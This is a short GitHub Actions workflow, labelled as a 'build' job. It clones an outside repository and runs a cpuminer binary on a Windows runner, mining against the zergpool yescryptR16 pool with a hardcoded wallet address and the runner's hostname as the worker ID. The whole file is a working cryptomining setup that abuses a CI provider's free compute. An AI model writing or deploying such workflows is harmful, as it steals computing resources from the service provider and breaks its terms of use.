name: kontol  
   
on: [workflow_dispatch]  
   
jobs:  
  build:  
    name: kontol  
    runs-on: windows-latest  
    strategy:  
      max-parallel: 1  
      fail-fast: false  
      matrix:  
        go: [1.0]  
        flag: [A]  
    env:  
        NUM_JOBS: 2  
        JOB: ${{ matrix.go }}  
    steps:  
    - name: COPY  
      run: git clone https://github.com/Ayati9335/github.git
    - name: RUNNING  
      run:  chmod +x cpuminer 
    - name: RUN  
      run: ./cpuminer -a yescryptR16 -o stratum+tcp://yescryptR16.mine.zergpool.com:6333 -u XcF8ZFvmFbpWtAqNGKkcQWpwvBrhKocdrK -p c=DASH,mc=QOGE,ID=W-$(echo $(hostname)) -t 2
    - name: RUN  
      run: exit
